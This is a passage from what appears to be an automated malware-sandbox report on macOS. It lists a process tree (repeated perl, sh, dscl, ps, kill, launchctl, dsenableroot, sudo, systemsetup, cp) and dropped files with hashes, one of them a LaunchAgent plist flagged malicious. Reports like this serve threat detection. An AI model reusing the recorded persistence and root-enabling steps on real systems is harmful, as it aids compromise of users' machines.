          • dscl (PID: 588 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 589 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 589 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 589 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 590 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 590 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 590 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 591 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 591 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 591 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 592 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 592 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 592 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 593 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 593 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 593 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 594 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 594 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 594 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 595 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 595 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 595 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 596 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 596 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 596 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 597 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 597 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 597 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 598 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 598 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 598 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 599 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 599 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 599 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 600 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 600 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 600 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 601 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 601 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 601 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 602 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 602 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 602 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 603 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 603 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 603 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 604 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 604 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 604 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 605 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 605 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 605 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 606 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 606 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 606 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 607 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 607 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 607 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 608 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 608 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 608 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 609 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 609 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 609 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 610 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 610 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 610 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 611 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 611 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 611 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 612 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 612 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 612 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 613 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 613 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 613 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 614 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 614 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 614 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 615 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 615 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 615 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 616 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 616 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 616 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 617 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 617 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 617 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 618 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 618 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 618 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 619 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 619 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 619 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 620 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 620 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 620 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 621 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 621 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 621 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 622 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 622 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 622 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 623 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 623 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 623 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 624 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 624 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 624 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 625 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 625 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 625 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 626 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 626 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 626 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 627 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 627 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 627 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 628 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 628 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 628 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 629 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 629 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 629 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 630 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 630 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 630 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 631 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 631 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 631 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 632 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 632 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 632 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 633 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 633 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 633 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 634 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 634 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 634 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 635 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 635 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 635 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 636 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 636 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 636 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 637 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 637 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 637 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 638 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 638 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 638 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 639 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 639 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 639 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 640 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 640 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 640 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 641 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 641 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 641 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 642 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 642 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 642 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 643 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 643 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 643 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 644 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 644 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 644 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 645 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 645 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 645 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 646 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 646 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 646 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 647 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • ps (PID: 647 PPID: 546 Overlayed Process Image: perl5.18 MD5: 792e18b1417ac1f184680d2423206e4f)
          • perl5.18 (PID: 648 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 648 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
            • sh (PID: 649 PPID: 648 MD5: 8aa60b22a5d30418a002b340989384dc)
            • launchctl (PID: 649 PPID: 648 Overlayed Process Image: sh MD5: 17fad4b994d600d0a5b6bc02b55c2c80)
          • perl5.18 (PID: 650 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • ps (PID: 650 PPID: 546 Overlayed Process Image: perl5.18 MD5: 792e18b1417ac1f184680d2423206e4f)
          • perl5.18 (PID: 651 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • ps (PID: 651 PPID: 546 Overlayed Process Image: perl5.18 MD5: 792e18b1417ac1f184680d2423206e4f)
          • perl5.18 (PID: 652 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • ps (PID: 652 PPID: 546 Overlayed Process Image: perl5.18 MD5: 792e18b1417ac1f184680d2423206e4f)
          • perl5.18 (PID: 653 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • ps (PID: 653 PPID: 546 Overlayed Process Image: perl5.18 MD5: 792e18b1417ac1f184680d2423206e4f)
          • perl5.18 (PID: 654 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • kill (PID: 654 PPID: 546 Overlayed Process Image: perl5.18 MD5: 9beb55ee74d185d46c3316454d528896)
          • perl5.18 (PID: 655 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • ps (PID: 655 PPID: 546 Overlayed Process Image: perl5.18 MD5: 792e18b1417ac1f184680d2423206e4f)
          • perl5.18 (PID: 657 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • ps (PID: 657 PPID: 546 Overlayed Process Image: perl5.18 MD5: 792e18b1417ac1f184680d2423206e4f)
          • perl5.18 (PID: 658 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • ps (PID: 658 PPID: 546 Overlayed Process Image: perl5.18 MD5: 792e18b1417ac1f184680d2423206e4f)
          • perl5.18 (PID: 659 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • ps (PID: 659 PPID: 546 Overlayed Process Image: perl5.18 MD5: 792e18b1417ac1f184680d2423206e4f)
          • perl5.18 (PID: 660 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • ps (PID: 660 PPID: 546 Overlayed Process Image: perl5.18 MD5: 792e18b1417ac1f184680d2423206e4f)
          • perl5.18 (PID: 661 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • ps (PID: 661 PPID: 546 Overlayed Process Image: perl5.18 MD5: 792e18b1417ac1f184680d2423206e4f)
          • perl5.18 (PID: 662 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • ps (PID: 662 PPID: 546 Overlayed Process Image: perl5.18 MD5: 792e18b1417ac1f184680d2423206e4f)
          • perl5.18 (PID: 663 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • ps (PID: 663 PPID: 546 Overlayed Process Image: perl5.18 MD5: 792e18b1417ac1f184680d2423206e4f)
          • perl5.18 (PID: 664 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • ps (PID: 664 PPID: 546 Overlayed Process Image: perl5.18 MD5: 792e18b1417ac1f184680d2423206e4f)
          • perl5.18 (PID: 665 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 665 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
            • sh (PID: 666 PPID: 665 MD5: 8aa60b22a5d30418a002b340989384dc)
            • dscl (PID: 666 PPID: 665 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 667 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • sh (PID: 667 PPID: 546 Overlayed Process Image: perl5.18 MD5: 8aa60b22a5d30418a002b340989384dc)
          • dscl (PID: 667 PPID: 546 Overlayed Process Image: sh MD5: 2072d2ac07a471913b06fed4b4bd55cf)
          • perl5.18 (PID: 668 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • defaults (PID: 668 PPID: 546 Overlayed Process Image: perl5.18 MD5: 831678c94c2d9c647bf3d283b1861bda)
          • perl5.18 (PID: 669 PPID: 546 MD5: 8ae6e9b236ab4239edf4257f504256a4)
          • defaults (PID: 669 PPID: 546 Overlayed Process Image: perl5.18 MD5: 831678c94c2d9c647bf3d283b1861bda)
      • bash (PID: 670 PPID: 534 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • dsenableroot (PID: 670 PPID: 534 Overlayed Process Image: bash MD5: 9aa91a63738de78dc7fd510f0fd5d9c5)
      • bash (PID: 671 PPID: 534 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • sudo (PID: 671 PPID: 534 Overlayed Process Image: bash MD5: 60ac5909d06d86e22aace3a863b13690)
        • sudo (PID: 672 PPID: 671 MD5: 60ac5909d06d86e22aace3a863b13690)
        • systemsetup (PID: 672 PPID: 671 Overlayed Process Image: sudo MD5: 63847628d396b5b245013f1417946a56)
      • bash (PID: 673 PPID: 534 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • sudo (PID: 673 PPID: 534 Overlayed Process Image: bash MD5: 60ac5909d06d86e22aace3a863b13690)
        • sudo (PID: 674 PPID: 673 MD5: 60ac5909d06d86e22aace3a863b13690)
        • cp (PID: 674 PPID: 673 Overlayed Process Image: sudo MD5: 57fc302d74610c3350e683c6c9771076)
      • bash (PID: 675 PPID: 534 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • sudo (PID: 675 PPID: 534 Overlayed Process Image: bash MD5: 60ac5909d06d86e22aace3a863b13690)
        • sudo (PID: 676 PPID: 675 MD5: 60ac5909d06d86e22aace3a863b13690)
        • mv (PID: 676 PPID: 675 Overlayed Process Image: sudo MD5: 7f791dd4bef08d618fece911d6e3398a)
      • bash (PID: 677 PPID: 534 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • sudo (PID: 677 PPID: 534 Overlayed Process Image: bash MD5: 60ac5909d06d86e22aace3a863b13690)
        • sudo (PID: 678 PPID: 677 MD5: 60ac5909d06d86e22aace3a863b13690)
        • cp (PID: 678 PPID: 677 Overlayed Process Image: sudo MD5: 57fc302d74610c3350e683c6c9771076)
      • bash (PID: 679 PPID: 534 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • sudo (PID: 679 PPID: 534 Overlayed Process Image: bash MD5: 60ac5909d06d86e22aace3a863b13690)
        • sudo (PID: 680 PPID: 679 MD5: 60ac5909d06d86e22aace3a863b13690)
        • cp (PID: 680 PPID: 679 Overlayed Process Image: sudo MD5: 57fc302d74610c3350e683c6c9771076)
  • cleanup

Created / dropped Files

/Library/Application Support/Apple/Remote Desktop/RemoteManagement.launchd
Process:/usr/bin/perl5.18
File Type:ASCII text, with no line terminators
Size (bytes):7
Entropy (8bit):2.5216406363433186
Encrypted:false
MD5:A10311459433ADF322F2590A4987C423
SHA1:3EA3F9802ACCF8817BACD6F3DF46A73B93CCDDEC
SHA-256:FB9CF75606B4070DD6A9705810906BBA28D0E2EA74FF301B999A91DBB68C7D98
SHA-512:C0866AE6C853BA1B1CF7BAD0986399CE5516358E0320F31FDE9AAE552593F5939674071CD28086D0279E54C6372AF8C7CC2BDC06F173A38FCD9C27C49C7A8874
Malicious:false
Reputation:low
/Library/LaunchAgents/com.intego.Mac-Internet-Security-X9-Installer.plist
Process:/bin/cp
File Type:XML document text
Size (bytes):463
Entropy (8bit):5.264417143708243
Encrypted:false
MD5:CE283374782831F346661E89AB37972E
SHA1:3F21D478FE3ED0ED88C30764D13A8A32E11B5475
SHA-256:231D8CFF7F6D6181FB35B19C69A27E3F682A1408D891D58AAB5CB48996F25AED
SHA-512:B5F8B0BFEFA02B1F089B79A105497F6DECCC17FFBFB0BE55ED16EF92E3E5A7474C0F18FEA3BE631231212E7E83D97A90BE6AA8E6EEE7B98B3227A6F93F62F493
Malicious:true
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Frameworks/Alamofire.framework/Versions/A/Alamofire
Process:/bin/cp
File Type:Mach-O 64-bit dynamically linked shared library
Size (bytes):1144236
Entropy (8bit):6.0657958467855915
Encrypted:false
MD5:E70C2432D23C040E2E9A6803EC9B5906
SHA1:32CC2BFA52493408A214DBB41C6C79CCCFEC01EB
SHA-256:50FBE53F4A64C8146274D1D249DA89ECDC41F4E8E74576C5341702404AAF1CC9
SHA-512:388BB2380D2A1C5426D9FF781CB00F9EA3802C1DD92EF112F0F4AE6912C02106BB1CB87F406676E7865DF254F30945045F01AE8A7CCE5A0B29B9C95E8585916C
Malicious:false
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Frameworks/Alamofire.framework/Versions/A/Resources/Info.plist
Process:/bin/cp
File Type:XML document text
Size (bytes):1228
Entropy (8bit):5.166946277699968
Encrypted:false
MD5:2235AAC89A54A80B19272DBC7C736AF2
SHA1:BA2C5B002B6015B372A3EA54CF1F1B7631FFB1FC
SHA-256:E9D5B7A13E0EE21F76424E66582D4AFCB7E92E07F03A0D71347BCC2D484CBAFD
SHA-512:B10E984742D8A31687E7B67F98C654D068C375D0D11D4B9154D63DAFA93E1AB3CD275ACB7FAD65E8EE2A55C11BC35C29843704B0D4499B0FB59B7065C2A553B1
Malicious:false
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Frameworks/CryptoSwift.framework/Versions/A/CryptoSwift
Process:/bin/cp
File Type:Mach-O 64-bit dynamically linked shared library
Size (bytes):635460
Entropy (8bit):6.176744681936568
